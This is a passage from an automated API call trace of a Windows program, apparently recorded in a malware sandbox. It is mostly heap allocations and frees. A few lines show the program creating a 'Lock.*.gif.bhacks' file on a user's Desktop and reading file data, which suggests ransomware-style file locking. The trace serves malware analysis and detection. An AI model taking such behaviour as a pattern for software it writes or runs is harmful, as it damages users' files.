out: hHeap=0x2af0000) returned 1 [0101.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0101.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75fd8 [0101.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.489] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0101.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0101.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0101.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0101.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.489] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.j51yJlAI1.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.j51yjlai1.gif.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0101.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0101.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0101.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cab020 [0101.494] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0101.494] ReadFile (in: hFile=0x44c, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0101.495] ReadFile (in: hFile=0x44c, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x260, lpOverlapped=0x0) returned 1 [0101.495] ReadFile (in: hFile=0x44c, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0101.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10260) returned 0x2abe880 [0101.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cab020 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0101.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10260) returned 0x2a7a130 [0101.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0101.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10260) returned 0x2abe880 [0101.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0101.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.502] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0101.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0101.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0101.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10260) returned 0x2abe880 [0101.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0101.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0101.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10260) returned 0x2a8a398 [0101.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0101.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0101.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0101.506] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0101.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0101.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: 